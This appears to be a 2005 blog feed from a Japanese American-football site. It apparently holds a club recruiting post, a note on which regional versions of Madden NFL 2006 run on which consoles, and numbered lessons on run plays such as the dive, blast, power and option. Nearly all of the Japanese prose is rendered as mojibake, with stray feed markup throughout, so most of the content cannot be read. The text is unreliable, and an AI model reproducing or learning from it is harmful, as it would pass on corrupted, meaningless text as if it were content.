    „‚½‚¿‚ּƒ`[ƒ€‚ּˆך”װ‚ּ“ֱ’¥‚ֽAƒƒƒnƒ‚ּ‚ֽ‚יƒNƒ‰ƒu‚ֵ‚ ‚י‚ֶ‚¢‚₪‚±‚ֶ‚ֵ‚·B’Zװ‚ּ—K‚ּ’†‚ֹ‚ֽ‚¢‚ֹµ‚µ‚³‚נ‚¿‡‚ם‚¹A -‚Pl‚Pl‚ׂ‚¢ˆ׃¯‚נ‚¿ר—¦‚ז‚­‘ֳ‹¦‚ּ‚ָ‚¢—K‚×o—ˆ‚י‚ז‚₪‚ֹS‚ׂ¯‚ִ‚¢‚‚·B‚‚½AƒOƒ‰ƒEƒ“ƒh‚נ—£‚ך‚י‚ֶז”yד”yײW‚ָ‚­’‡‚ׂז‚­A -ˆך‚ֹ—V‚ס‚¾‚טˆש‚ס‚¾‚ט‚א‚µ‚ִ‚¢‚‚·B
    -‘וw‚ֹ“‚ֱ‚ִ‚©‚חAƒAƒƒtƒg‚נn‚‚½‘Iט‚׃`[ƒ€‚ּ‚X‚O“ˆָד‚ֵAƒ`[ƒ€‚ֽ®‘Sְ—ֽו‹`‚ֵ‚ ‚טA‰÷‚ּw”N‚ֵ‚א—ֽ‚ּ‚ ‚י‘Iט‚ֽA -‚·‚®‚ֹ‡‚ֹo‚ִAˆ–פ‚·‚י‚±‚ֶ‚×o—ˆ‚‚·B

    -

    „‚½‚¿‚ּƒNƒ‰ƒu‚ֹ‚ֽ—lX‚ָw•”w¶‚ב®‚µAֲ«“I‚ָl‚×”סם‚ֹ‘½‚­A -‚»‚ֲּ«‚נ\•ֹׂL‚־‚µˆ‚©‚µ‚ִ‚­‚ך‚יƒ`[ƒ€‚ּ•µˆֽ‹C‚ׂ ‚ט‚‚·BƒAƒƒtƒg‚נy‚µ‚‚±‚ֶ‚נ–Y‚ך‚¸A -‚P‚ֲ‚ּ–•W‚ֹ‚©‚¢‘S—ֽ‚ֵ“w—ֽ‚·‚י‚·‚־‚ח‚µ‚¢ƒ`[ƒ€‚ֵ‚·B

    ]]> -
    -
    - -ƒ}ƒbƒfƒ“NFL2006 - -2005-06-28T12:58:44Z -2005-06-28T09:30:55Z -tag:www.amefoot.net,2005://2.1413 -2005-06-28T09:30:55Z -ƒ}ƒbƒfƒ“NFL2006 “ת•ִ‚ֵֵ‚א”„‚ך‚ִ‚יƒAƒƒtƒg‚ּƒQ[ƒ€Auƒ}ƒbƒfƒ“NFLvƒV... - -shusaku - -shusaku_18@ybb.ne.jp - -0100)“ֱWƒAƒƒtƒgƒOƒbƒY - -ƒ}ƒbƒfƒ“NFL2006

    -

    “ת•ִ‚ֵֵ‚א”„‚ך‚ִ‚יƒAƒƒtƒg‚ּƒQ[ƒ€Auƒ}ƒbƒfƒ“NFLvƒVƒ[ƒY‚ּ2006”N”ֵ‚נ‘‚­ƒvƒ[‚µ‚½‚¢l‚ײ‚ּמ•ס‚ֵ‚·B

    ]]> -c”O‚ָ‚ׂחAuƒ}ƒbƒfƒ“NFL2006v - ‚ּ“ת–{”ֵ‚ֽ–¢‚¾”­”„“ת‚׈‚‚ֱ‚ִ‚¢‚‚¹‚סB

    -

    ”ּ”„’†~‚©H -‚ָ‚ס‚ִ‚¢‚₪ƒEƒƒT‚‚ֵ—¬‚ך‚יף‘װ‚ֵ‚·B(‚ ‚­‚‚ֵ‚אƒEƒƒT‚ֵ‚·‚ז`I)

    -

    ‘ׂ‚¿‚«‚ך‚ָ‚¢•‚ּ‚½‚‚ֹACO”ֵ‚ּ -uƒ}ƒbƒfƒ“NFL2006v‚ֵ—V‚װ‚½‚‚ּמ•ס‚נ‚¨’m‚ח‚¹‚µ‚‚·I

    -

     

    -

    - - - - - - -
    ¦@^‚ֽ–k•ִPS2”ֵAuƒ}ƒbƒfƒ“NFL2006v‚ֵ‚·B

    -

     

    -

    ‚‚¸A’ˆ׃‚µ‚ָ‚¢‚ֶ‚¢‚¯‚ָ‚¢‚ּ‚ֽAƒQ[ƒ€‹@ם‚ֹ‚ז‚ֱ‚ִ‚ֽA“ת–{”ֵ‚ּ–{‘ּ‚ֵ‚ֽA -CO”ֵƒ\ƒtƒg‚ד®ל‚µ‚ָ‚¢ך‡‚ׂ ‚י‚ֶ‚¢‚₪‚±‚ֶ‚ֵ‚·B

    -

    uƒ}ƒbƒfƒ“NFL2006v‹@ם•ˆך——

    -

    EƒvƒƒCƒXƒe[ƒVƒ‡ƒ“2”ֵuƒ}ƒbƒfƒ“NFL2006v -(89“ת”­”„—\’ט)

    -

    ¨–k•ִ”ֵƒvƒƒCƒXƒe[ƒVƒ‡ƒ“2 -‚ֵ‚ּ‚“®ל‚µ‚‚·B

    -

    EX-BOX”ֵuƒ}ƒbƒfƒ“NFL2006v -(89“ת”­”„—\’ט)

    -

    ¨–k•ִ”ֵX-BOX -‚ֵ‚ּ‚“®ל‚µ‚‚·B

    -

    EƒQ[ƒ€ƒLƒ…[ƒu”ֵuƒ}ƒbƒfƒ“NFL2006v -(89“ת”­”„—\’ט)

    -

    ¨–k•ִ”ֵƒQ[ƒ€ƒLƒ…[ƒu -‚‚½‚ֽA -“ת–{”ֵƒQ[ƒ€ƒLƒ…[ƒu(—vFreeLoader -)‚ֵ“®ל‚µ‚‚·B

    -

    EPSP”ֵuƒ}ƒbƒfƒ“NFL2006v -(927“ת”­”„—\’ט)

    -

    ¨“ת–{”ֵ‚נ‚‘S‚ִ‚ּPSP‚ֵ“®ל‚µ‚‚·B

    -

    Eƒjƒ“ƒeƒ“ƒh[DS”ֵuƒ}ƒbƒfƒ“NFL2006v -(89“ת”­”„—\’ט)

    -

    ¨“ת–{”ֵ‚נ‚‘S‚ִ‚ּƒjƒ“ƒeƒ“ƒh[DS‚ֵ“®ל‚µ‚‚·B

    -

    EWindows”ֵuƒ}ƒbƒfƒ“NFL2006v -(89“ת”­”„—\’ט)

    -

    ¨“®לֲ‹«‚ֽ–¢’ט

    -

    ‚ֲ‚‚טA“ת–{”ֵ‚ּuPSPv‚ֶuƒjƒ“ƒeƒ“ƒh[DSv‚נ‚¨‚¿‚ּ•‚ֽACO”ֵ‚ּuƒ}ƒbƒfƒ“NFL2006v -‚נw“‚·‚ך‚־‚·‚®‚ֹ—V‚׳‚ֶ‚¢‚₪‚±‚ֶ‚ֵ‚·B

    -

    ‚‚½AƒQ[ƒ€ƒLƒ…[ƒu‚ֵ‚ ‚ך‚־AFreeLoader -‚ׂ ‚ך‚־OK‚ֵ‚·B

    -

    ƒvƒƒCƒXƒe[ƒVƒ‡ƒ“2AX-BOX‚ּך‡‚ֽA–k•ִ”ֵ‚ּ–{‘ּ‚נw“‚·‚י•K—v‚ׂ ‚ט‚‚·‚×A -‚±‚ך‚©‚ח‚אƒ}ƒbƒfƒ“ƒVƒ[ƒY‚ֽ•ִ‘—Dז‚ֵ”­”„‚³‚ך‚י‚±‚ֶ‚ֽ–‚ֹ©‚¦‚ִ‚¢‚‚·‚ּ‚ֵA -ƒtƒ@ƒ“‚ּ•‚ֵ‚ ‚ך‚־‚±‚ך‚נ‹@‚ֹw“‚³‚ך‚ִ‚א‘¹‚ֽ‚µ‚ָ‚¢‚ֶv‚ם‚ך‚‚·B

    -

     

    -

    ‚א‚₪1‚ֲ‚ּ’ˆ׃“_‚ֽA“–‘R‚ֵ‚·‚×ACO”ֵ‚ֽא–¾‘‚נ‚‚ִ‘S‚ִ‰pך‚ֵ‚·B

    -

    ‚‚ AƒAƒƒtƒgƒQ[ƒ€‚ֽ“ת–{ך”ֵ‚ֵ‚א‰pך‚¾‚ח‚¯‚ֶ‚¢‚₪‚ּ‚×»ף‚ָ‚ּ‚ֵA‚³‚‚ַˆב˜a´‚ֽ‚ָ‚¢‚ֶv‚¢‚‚·‚×EEEB

    ]]> -
    -
    - -‘ז15‰סFƒAƒƒtƒg‚ּU‚ƒvƒ[(2)ƒ‰ƒ“ƒvƒ[(ד•ׂ) - -2005-06-23T09:36:42Z -2005-06-23T09:34:21Z -tag:www.amefoot.net,2005://2.1399 -2005-06-23T09:34:21Z -‘ז15‰סFƒAƒƒtƒg‚ּU‚ƒvƒ[(2)ƒ‰ƒ“ƒvƒ[(ד•ׂ) ‘O‰ס‚ֹˆר‚«‘±‚«AƒAƒƒtƒg... - -shusaku - -shusaku_18@ybb.ne.jp - -0200)ƒAƒƒtƒg“–ו - -‘ז15‰סFƒAƒƒtƒg‚ּU‚ƒvƒ[(2)ƒ‰ƒ“ƒvƒ[(ד•ׂ)

    -

    ‘O‰ס‚ֹˆר‚«‘±‚«AƒAƒƒtƒg‚ּƒ‰ƒ“ƒvƒ[‚ּ׀‰מ‚נ‚¢‚½‚µ‚‚·B‚ ‚‚ט[‚­l‚¦‚¸‚ֹAu‚±‚ס‚ָƒvƒ[‚ׂ ‚י‚ס‚¾‚ָ‚v -‚­‚ח‚¢‚ֹ©‚ִ‚¢‚½‚¾‚¯‚ך‚־\•ׂ¾‚ֶv‚¢‚‚·B

    ]]> -‘O‰ס(‘ז14‰ס)‚ֽA - ƒ_ƒCƒuAƒuƒ‰ƒXƒgAƒpƒ[A -ƒIƒvƒVƒ‡ƒ“‚נ‚²׀‰מ‚¢‚½‚µ‚‚µ‚½B

    -

     

    -

    15-1.ƒXƒC[ƒvEƒvƒ[

    -

    ƒ‰ƒ“ƒjƒ“ƒOƒoƒbƒN( ‚h ƒtƒH[ƒ[ƒVƒ‡ƒ“‚ֵ‚ֽ’םTB)‚ֽAˆך–U‚ֹO‘₪‚ֹ‚©‚ֱ‚ִ‘–‚ט‚‚·B

    -

    QB‚ֽATB‚ֹƒ{[ƒ‹‚נƒsƒbƒ`(ƒgƒX)‚·‚י‚±‚ֶ‚ֹ‚ז‚ֱ‚ִ“n‚µ‚‚·B

    -

    ƒIƒtƒFƒ“ƒXƒ‰ƒCƒ“‚נ‰‚‚ֶ‚·‚יƒuƒƒbƒJ[‚½‚¿‚ֽA‘טƒfƒBƒtƒFƒ“ƒX‚נO‘₪‚ֹs‚©‚¹‚ָ‚¢‚ז‚₪‚ֹƒuƒƒbƒN‚µ‚‚·B

    -

    ‚±‚ּ‚ז‚₪‚ָƒvƒ[‚נƒXƒC[ƒv‚ִֶ‚ׁAƒpƒ[‚ּ‚ז‚₪‚ֹG‚ּƒvƒ‹ƒAƒEƒg‚ָ‚ַ‚נ—p‚¢‚ִA - ƒuƒƒbƒJ[‚ּ”‚נ‘‚ג‚»‚₪‚ֶ‚·‚יX‚ֹ‚ ‚ט‚‚·B

    -

    -

    ד}‚ֽA—¼ƒTƒCƒh‚ּG‚נƒvƒ‹ƒAƒEƒg‚³‚¹‚½—ב‚ֵ‚·‚×A•׀•‚ֵ‚ ‚ֱ‚½‚טAT‚׃vƒ‹ƒAƒEƒg‚·‚יך‡‚ָ‚ַAƒ`[ƒ€‚ז‚ֱ‚ִ—lX‚ֵ‚·B

    -

    ‚±‚±‚ֵ‚ֽACB‚נƒuƒƒbƒN‚·‚י‚ּ‚×WR‚ֵ‚ֽ‚ָ‚­AFB‚ֶ‚ָ‚ֱ‚ִ‚¢‚‚·B

    -

    ‚±‚ך‚ֽAWR‚×CB‚נƒuƒƒbƒN‚·‚י‚ֶATB‚ד’B‚·‚י‚‚ֵ‚ּ’·‚¢װ‚נƒuƒƒbƒN‚µ‘±‚¯‚ִ‚¢‚ָ‚¢‚ֶ‚¢‚¯‚ָ‚­‚ָ‚ֱ‚ִ‚µ‚‚·‚©‚ח‚ֵ‚·B -

    -

    WR‚דא‘₪‚ּSS‚גOLB‚נƒuƒƒbƒN‚·‚י‚±‚ֶ‚נƒNƒ‰ƒbƒNE -ƒuƒƒbƒN‚ִֶ‚ׁ‚‚·B

    -

     

    -

    15-2.ƒgƒ‰ƒbƒvEƒvƒ[

    -

    ƒfƒBƒtƒFƒ“ƒXƒ‰ƒCƒ“‚נƒgƒ‰ƒbƒv(ד©)‚ֹ‚©‚¯‚יƒvƒ[‚נƒgƒ‰ƒbƒvE -ƒvƒ[‚ִֶ‚ׁ‚‚·B

    -

    —ב‚¦‚־ADT‚ֶ‚©‚¢‡‚ֱ‚½G‚×A‚ ‚½‚©‚אƒpƒXE -ƒvƒƒeƒNƒVƒ‡ƒ“‚ּ‚ז‚₪‚ֹ1•א‰÷‚ׂט‚‚·B‚»‚µ‚ִA -DT‚דֻ‚ֱ‚ס‚ֵ‚«‚½‚ֶ‚±‚כ‚נ‹tƒTƒCƒh‚ּG‚׉¡‚©‚ח‘ּ“–‚½‚ט‚·‚י‚ז‚₪‚ָƒuƒƒbƒN‚נƒgƒ‰ƒbƒvE -ƒuƒƒbƒN‚ֶ‚¢‚¢‚‚·B

    -

    -

    ד}‚ֵ‚ֽA‰÷‘₪‚ּG‚×1•א‰÷‚ׂטA‚»‚ּ‚©‚¢‚ּDT‚נד‘₪‚ּG‚׃uƒƒbƒN‚µ‚ִ‚¢‚‚·B

    -

    DT‚בS‚­‹C‚ֳ‚©‚ָ‚¢‚ֶ‚±‚כ‚©‚חƒuƒƒbƒN‚³‚ך‚ִAƒfƒBƒtƒFƒ“ƒXƒ‰ƒCƒ“‚ֹ‘ו‚«‚ָ‚×J‚¯‚־¬ק‚ֵ‚·B

    -

    1•א‰÷‚ֱׂ‚½G‚ֶAƒ{[ƒ‹‚ֱ‚½FB‚ׂ»‚ּ‘ו‚נ’‚ֱ‚ִ‘Oi‚µ‚‚·B

    -

     

    -

    15-3.ƒhƒ[ƒvƒ[

    -

    ‚‚¸ֵ‰‚ֹAƒIƒtƒFƒ“ƒX‘Sˆץ‚׃pƒXƒvƒ[‚ּ“®‚«‚נ‚µ‚‚·B

    -

    QB‚ֽד‚כ‚ֹ‰÷‚ׂט(ƒhƒƒbƒvƒoƒbƒN)AƒpƒX‚נ“‚°‚י\‚¦‚נ©‚¹AƒIƒtƒFƒ“ƒXƒ‰ƒCƒ“‚א‰÷‚ׂט‚ָ‚ׂחƒpƒXƒvƒƒeƒNƒVƒ‡ƒ“‚נ‚µ‚‚·B -

    -

    WR‚גTE‚אAƒpƒXƒR[ƒX(ƒpƒX‚נף‚¯‚י‚½‚‚ֹ‘–‚יƒR[ƒX)‚ֹo‚‚·B

    -

    ƒfƒBƒtƒFƒ“ƒXƒ‰ƒCƒ“‚ֶAƒ‰ƒCƒ“ƒoƒbƒJ[‚ּˆך•”‚ֽQB‚ֹP‚¢|‚©‚ֱ‚ִ‚«‚‚·‚×A‚»‚±‚ֵ“ֻ‘Rƒ‰ƒ“ƒjƒ“ƒOƒoƒbƒN‚ֹƒ{[ƒ‹‚נ“n‚µ‚‚·B -

    -

    ‚±‚ּ‚ז‚₪‚ֹAuƒpƒXƒvƒ[‚ֶ©‚¹‚©‚¯‚ְִ‚ֽƒ‰ƒ“ƒvƒ[v -‚ֶ‚¢‚₪ƒvƒ[‚נƒhƒ[‚ִֶ‚ׁ‚‚·B

    -

    -

    QB‚ֹP‚¢|‚©‚ֱ‚ִ‚«‚½ƒfƒBƒtƒFƒ“ƒX‚ֶ‚·‚ךˆב‚₪‚ז‚₪‚ֹ‚µ‚ִƒ‰ƒ“ƒjƒ“ƒOƒoƒbƒN‚ב–‚י‚±‚ֶ‚ֵׂ‚«‚ך‚־¬ק‚ֵ‚·B

    -

    ’םAƒ‰ƒCƒ“ƒoƒbƒJ[‚גƒfƒBƒtƒFƒ“ƒVƒuƒoƒbƒN‚ֽƒpƒXƒJƒo[(WR‚ָ‚ַ‚נ–WQ)‚·‚י‚½‚‚ֹ[‚­‰÷‚ֱׂ‚ִ‚¢‚י‚ּ‚ֵA -ƒ‰ƒ“ƒjƒ“ƒOƒoƒbƒN‚ֽ‘ו‚«‚­‘Oi‚·‚י‚±‚ֶ‚ֵׂ‚«‚‚·B

    -

     

    -

    15-4.ƒƒo[ƒXEƒvƒ[

    -

    ‘O‰ס׀‰מ‚µ‚½ƒIƒvƒVƒ‡ƒ“Eƒvƒ[‚גA¡‰ס‚ּƒXƒC[ƒvEƒvƒ[‚ּ‚ז‚₪‚ֹA -ƒIƒtƒFƒ“ƒXƒ‰ƒCƒ“‚ּO‘₪‚ֹ‚©‚ֱ‚ִ‘–‚יƒvƒ[‚נƒI[ƒvƒ“Eƒvƒ[‚ִֶ‚ׁ‚‚·‚×A - —ב‚¦‚־A‰EƒTƒCƒh‚ּƒI[ƒvƒ“ƒvƒ[‚ֶ©‚¹‚©‚¯‚ִAְ‚ֽ¶ƒTƒCƒh‚ּ‚ֹ‘–‚י‚ז‚₪‚ָƒvƒ[‚נAƒƒo[ƒXEƒvƒ[‚ִֶ‚ׁ‚‚·B

    -

    -

    ‚±‚ך‚א‚©‚ָ‚ט‚ג‚ג‚±‚µ‚¢}‚ֵ‚·‚×Aƒƒo[ƒX‚ּ1—ב‚ֵ‚·B

    -

    ‰÷ƒTƒCƒh‚ּƒXƒC[ƒv‚ֶ©‚¹‚©‚¯‚ִAWR‚×דƒTƒCƒh‚ֹ‘–‚יƒpƒ^[ƒ“‚ֵ‚·B

    -

    QB‚×TB‚ֹƒ{[ƒ‹‚נƒsƒbƒ`‚µ‚ִAƒIƒtƒFƒ“ƒXƒ‰ƒCƒ“‚גFB‚א‰÷ƒTƒCƒh‚ֹƒuƒƒbƒN‚ֹ‚©‚¢‚‚·B

    -

    ‚»‚µ‚ִA‰÷ƒTƒCƒh‚ּWR‚×ATB‚©‚ח‚±‚ֱ‚»‚טƒ{[ƒ‹‚נף‚¯ז‚ֱ‚ִA -‹tƒTƒCƒh‚ֹ‘–‚ט‚‚·B

    -

    “¯‚ֹA‰÷ƒTƒCƒh‚ּG‚ֶT‚ֽAƒ{[ƒ‹‚נ‚ֱ‚½WR‚נל‰q‚·‚י‚ז‚₪‚ֹ‚µ‚ִAדƒTƒCƒh‚ֹ‘–‚ט‚¾‚µ‚‚·B

    -

    ƒ‰ƒCƒ“ƒoƒbƒJ[‚גƒfƒBƒtƒFƒ“ƒVƒuƒoƒbƒN‚׉÷ƒTƒCƒh‚ֹ”½‰‚µ‚ִA‹tƒTƒCƒh‚×–³l‚ּr–ל‚ֹ‚ָ‚ֱ‚ִ‚¢‚ך‚־‘ו¬ק‚ֵ‚·B

    -

     

    -

     

    -

    ˆָדA2‰ס‚ֹ‚ם‚½‚ט‘ד•\“I‚ָƒ‰ƒ“ƒvƒ[‚נ‚²׀‰מ‚µ‚‚µ‚½B

    -

    ‰ס‚ֽAƒpƒXƒvƒ[‚ּם—‚נ‚²׀‰מ‚¢‚½‚µ‚‚·B

    ]]> -
    -
    - -‘ז14‰סFƒAƒƒtƒg‚ּU‚ƒvƒ[(1)ƒ‰ƒ“ƒvƒ[(‘O•ׂ) - -2005-06-19T14:01:18Z -2005-06-19T13:57:10Z -tag:www.amefoot.net,2005://2.1339 -2005-06-19T13:57:10Z -‘ז14‰סFƒAƒƒtƒg‚ּU‚ƒvƒ[(1)ƒ‰ƒ“ƒvƒ[(‘O•ׂ) ¡‰ס‚©‚חAƒAƒƒtƒg‚ּ‘ד•\... - -shusaku - -shusaku_18@ybb.ne.jp - -0200)ƒAƒƒtƒg“–ו - -‘ז14‰סFƒAƒƒtƒg‚ּU‚ƒvƒ[(1)ƒ‰ƒ“ƒvƒ[(‘O•ׂ)

    -

    ¡‰ס‚©‚חAƒAƒƒtƒg‚ּ‘ד•\“I‚ָU‚ƒvƒ[‚נ׀‰מ‚¢‚½‚µ‚‚·Bƒ‰ƒ“ƒvƒ[‚ֶƒpƒXƒvƒ[‚ׂ ‚ט‚‚·‚×A¡‰ס‚ֽƒ‰ƒ“ƒvƒ[‚ּ׀‰מ‚ֵ‚·B -ם—‚ב½‚¢‚ּ‚ֵA2‰ס‚ֹ•ׂ¯‚‚·B‚‚¸‚ֽ‘O•ׂ‚ֵ‚·B

    ]]> -ƒAƒƒtƒg‚ּƒIƒtƒFƒ“ƒX‚ֽ’םAƒvƒ[‚²‚ֶ‚ֹ‘Sˆץ‚ּ“®‚«•‚׈‚‚ֱ‚ִ‚¢‚‚·B

    -

    uƒNƒH[ƒ^[ƒoƒbƒN‚×’N‚ֹƒ{[ƒ‹‚נ“n‚·‚©Bv

    -

    uƒ{[ƒ‹‚נ‚ֱ‚½‘Iט(ƒLƒƒƒƒA[‚ִֶ‚װ)‚ַׂ‚±‚נ‘–‚י‚©Bv

    -

    u’N‚×’N‚נƒuƒƒbƒN‚·‚י‚©v

    -

    EEE‚ָ‚ַ‚×A‚·‚׳‚ִˆ‚‚ֱ‚ִA1‚ֲ‚ּƒvƒ[‚ֹ‚ָ‚י‚ּ‚ֵ‚·B

    -

    1‚ֲ‚ּƒ`[ƒ€‚ֽ‰½ם—‚א‚ּƒvƒ[‚נ‚ֱ‚ִ‚¢‚ִA‚»‚ך‚¼‚ך‚ּƒvƒ[‚ֹƒ`[ƒ€“ֱ—L‚ּ–¼‘O‚וt‚¯‚ח‚ך‚ִ‚¢‚‚·B

    -

     

    -

    —ב‚¦‚־Au36ƒgƒ€ƒLƒƒƒbƒgv -‚ֶ‚¢‚₪–¼‘O‚ּƒvƒ[‚ׂ ‚י‚ֶ‚µ‚‚·B

    -

    ƒNƒH[ƒ^[ƒoƒbƒN‚׃vƒ[Jn‘O‚ּƒnƒhƒ‹(לם‰ן‹c)‚ֵA‚±‚ּ–¼‘O‚נ¾‚¦‚־A‘Sˆץ‚×u36ƒgƒ€ƒLƒƒƒbƒgv‚ּ©•ּׂ–נ„‚נv‚¢o‚µ‚ִA -ƒvƒ[‚ֹ—ױ‚‚‚·B

    -

    ƒIƒtƒFƒ“ƒX‚ּ‘Iט‚ֽA‘Sƒvƒ[‚ֹ‚ֲ‚¢‚ִA©•ּׂ–נ„‚נo‚¦‚ִ‚¢‚ָ‚­‚ִ‚ֽ‚ָ‚ט‚‚¹‚סB -

    -

     

    -

    ƒAƒƒtƒgƒ`[ƒ€‚ֽA©•ׂ½‚¿‚ּg‚₪ƒvƒ[‚נ‘S‚ִ‹L‚µ‚½u–{v -‚נ‚ֱ‚ִ‚¢‚‚·B‚±‚ּ–{‚נuƒvƒ[ƒuƒbƒNv - ‚ִֶ‚ׁ‚‚·B

    -

    ֲX‚ּƒvƒ[‚ּ–¼‘O‚ֽƒ`[ƒ€‚²‚ֶ‚ֹˆ‚‚ח‚ך‚י‚א‚ּ‚ֵ‚·‚×Aˆך”“I‚ֹ‚ֽ‰½ם—‚©‚ֹ•×—‚³‚ך‚ִ‚‚·B

    -

    ‚±‚±‚ֵ‚ֽA‚»‚ּ•×—–¼‚ֹ‰ˆ‚ֱ‚ִA‚²׀‰מ‚µ‚ִ‚¢‚«‚½‚¢‚ֶv‚¢‚‚·B

    -

    ‚ָ‚¨AƒIƒtƒFƒ“ƒX‘ּ^‚ֽ ‚h ƒtƒH[ƒ[ƒVƒ‡ƒ“‚נ—ב‚ֹא–¾‚µ‚ִ‚¢‚‚·B -

    -

     

    -

    14-1.ƒ_ƒCƒuEƒvƒ[

    -

    ƒ‰ƒ“ƒjƒ“ƒOƒoƒbƒN‚×A^‚ֱ’¼‚®‚ֹ“G‚ּ’†‰›•t‹‚ֹ”ע‚ׁ‚ƒvƒ[‚נuƒ_ƒCƒuv - ‚ֶ‚ז‚ׁ‚‚·B

    -

    ‚±‚±‚ֵ‚ֽA‚h ƒtƒH[ƒ[ƒVƒ‡ƒ“‚ָ‚ּ‚ֵAFB(ƒtƒ‹ƒoƒbƒN)‚ב–‚ט‚‚·B

    -

    QB(ƒNƒH[ƒ^[ƒoƒbƒN)‚ֽAC(ƒZƒ“ƒ^[)‚©‚חƒXƒiƒbƒv‚נף‚¯‚י‚ֶA‚·‚®‚ֹFB‚ֹט“n‚µ‚µ‚‚·B

    -

    ‚±‚ּט“n‚µ‚ּ‚±‚ֶ‚נAuƒnƒ“ƒhƒIƒtv‚ִֶ‚ׁ‚‚·B

    -

    ’םAƒIƒtƒFƒ“ƒXƒ‰ƒCƒ“‚א©•ּׂ³–‚ּ‘ט‚נ^‚ֱ’¼‚®‚ֹƒuƒƒbƒN‚µ‚‚·B

    -

    -

    ƒIƒtƒFƒ“ƒXƒ‰ƒCƒ“‚ֶƒfƒBƒtƒFƒ“ƒXƒ‰ƒCƒ“‚ּ—ֽײW‚×ֵ‚א‰e‹¿‚µ‚ג‚·‚¢ƒvƒ[‚ֵ‚·B

    -

    ֵ‚אƒƒXƒN‚ּ­‚ָ‚¢ƒvƒ[‚ֵ‚ ‚י‘ד‚ם‚ט‚ֹA5`6ƒ„[ƒhi‚‚־¬ק‚ֶ¾‚¦‚‚·B

    -

     

    -

    14-2.ƒuƒ‰ƒXƒgEƒvƒ[

    -

    ƒfƒBƒtƒFƒ“ƒXƒ‰ƒCƒ“‚ּ1l‚נƒIƒtƒFƒ“ƒXƒ‰ƒCƒ“2l‚ֵƒuƒƒbƒN‚µ‚‚·B

    -

    ‚±‚ך‚נuƒ_ƒuƒ‹v‚‚½‚ֽ -uƒ_ƒuƒ‹ƒuƒƒbƒNv‚ֶ¾‚¢‚‚·B

    -

    “–‘RALB(ƒ‰ƒCƒ“ƒoƒbƒJ[)‚ּ1l‚×—]‚י‚ּ‚ֵA‚»‚ך‚ֽFB‚׃uƒƒbƒN‚µ‚‚·B

    -

    ‚»‚µ‚ִAƒ{[ƒ‹‚נ‚ֱ‚ִ‘–‚י‚ּ‚ֽATB(ƒeƒCƒ‹ƒoƒbƒN)‚ֹ‚ָ‚ט‚‚·B

    -

    ‚±‚ּ‚ז‚₪‚ָƒvƒ[‚נAuƒuƒ‰ƒXƒgv‚ִֶ‚ׁ‚‚·B

    -

    -

    ‚±‚ּƒvƒ[‚ֽAƒ_ƒuƒ‹‚ֵƒuƒƒbƒN‚µ‚ִ‚¢‚יDT(ƒfƒBƒtƒFƒ“ƒXƒ^ƒbƒNƒ‹)‚נ‰‚µ״‚טA -ƒfƒBƒtƒFƒ“ƒXƒ‰ƒCƒ“‚ּ‚נ‚ַ‚ך‚¾‚¯L‚°‚ח‚ך‚י‚©‚×d—v‚ֶ‚ָ‚ט‚‚·B

    -

    FB+TB‘־OLB‚ֶ‚¢‚₪A2‘־1‚ּף‹µ‚נל‚טo‚¹‚ך‚־AƒIƒtƒFƒ“ƒX‚ּ‚¿‚ֶ¾‚¦‚י‚ֵ‚µ‚ו‚₪B

    -

     

    -

    14-3.ƒpƒ[ƒvƒ[

    -

    U‚ƒ|ƒCƒ“ƒg‚ֹA‰ֲ”\‚ְָ‚ט‚ּl”‚ּƒuƒƒbƒJ[‚נW‚Au—ֽv‚ֵ•‰‚·‚יƒvƒ[‚נ -uƒpƒ[v‚ִֶ‚ׁ‚‚·B

    -

    ˆך”“I‚ֹ‚ֽADE(ƒfƒBƒtƒFƒ“ƒXƒGƒ“ƒh)‚ּ“א‘₪‚נU‚ƒ|ƒCƒ“ƒg‚ֶ‚µA‹tƒTƒCƒh‚ּG(ƒK[ƒh)‚×AU‚ƒTƒCƒh‚ֹ‘–‚ֱ‚ִ‚«‚‚·B

    -

    ‚±‚ך‚נAuƒvƒ‹v‚‚½‚ֽAuƒvƒ‹ƒAƒEƒgv‚ֶ‚¢‚¢AG‚ֹƒXƒs[ƒh‚׋‚‚ח‚ך‚י‚ּ‚ֽA‚±‚ך‚ׂ ‚י‚©‚ח‚ֵ‚·B

    -

    -

    ‚©‚ָ‚טƒSƒ`ƒƒƒSƒ`ƒƒ‚µ‚ִ‚¢‚‚·‚ֻB‚±‚ּƒSƒ`ƒƒƒSƒ`ƒƒ‚µ‚½ƒvƒ[‚×Auƒpƒ[v‚ָ‚ס‚ֵ‚·B

    -

    2“_‚¾‚¯’–‚µ‚ִ‚­‚¾‚³‚¢B

    -

    ‚‚¸A‹tƒTƒCƒh(ד‘₪)‚ּG‚ּ“®‚«B‚±‚ך‚×Auƒvƒ‹ƒAƒEƒgv‚ֵ‚·B -

    -

    U‚ƒTƒCƒh(‰÷‘₪)‚ּT(ƒ^ƒbƒNƒ‹)‚ּO‘₪‚‚ֵ‘–‚ֱ‚ִ‚«‚‚·B

    -

    ‚א‚₪1“_‚ֽAFB‚ּ“®‚«‚ֵ‚·B

    -

    ‘–‚ט‚±‚ס‚ֵ‚«‚½DE‚נ‰¡‚©‚חƒuƒƒbƒN‚µ‚ִ‰‚µo‚µ‚‚·B‚±‚ך‚נuƒLƒbƒNƒAƒEƒgv - ‚ִֶ‚ׁ‚‚·B

    -

    ‚א‚¿‚כ‚סA}‚ֽˆך—ב‚ֵ‚ ‚טAƒvƒ‹ƒAƒEƒg‚µ‚½‹tƒTƒCƒh‚ּG‚×ADE‚נƒLƒbƒNƒAƒEƒg‚·‚י‚ז‚₪‚ָ•–@‚אl‚¦‚ח‚ך‚‚·B

    -

     

    -

    14-4.ƒIƒvƒVƒ‡ƒ“Eƒvƒ[

    -

    ƒfƒBƒtƒFƒ“ƒX‚ּ1l‚נ‚ ‚¦‚ִƒuƒƒbƒN‚¹‚¸A©—R‚ָף‘װ‚ֹ‚µ‚‚·B -

    -

    ‚±‚ּAƒuƒƒbƒN‚µ‚ָ‚¢ƒfƒBƒtƒFƒ“ƒX‘Iט‚נAuƒIƒvƒVƒ‡ƒ“ƒ}ƒ“v -‚ִֶ‚ׁ‚‚·B

    -

    QB‚ֽAƒ{[ƒ‹‚נ©‚ח‚ֱ‚½‚‚AO‘₪‚ֹ‘–‚ט‚‚·B

    -

    TB‚ֽAQB‚ֶ•ְ‚ס‚ֵA‚ג‚ֽ‚טO‘₪‚ֹ‘–‚ט‚‚·B

    -
      -
    • ƒIƒvƒVƒ‡ƒ“ƒ}ƒ“‚×AQB‚נƒ^ƒbƒNƒ‹‚µ‚ֹ—ˆ‚½‚חAQB‚ֽTB‚ֹƒ{[ƒ‹‚נƒsƒbƒ`(ד•‚ײ‚ּƒpƒX)‚µ‚‚·B
    • -
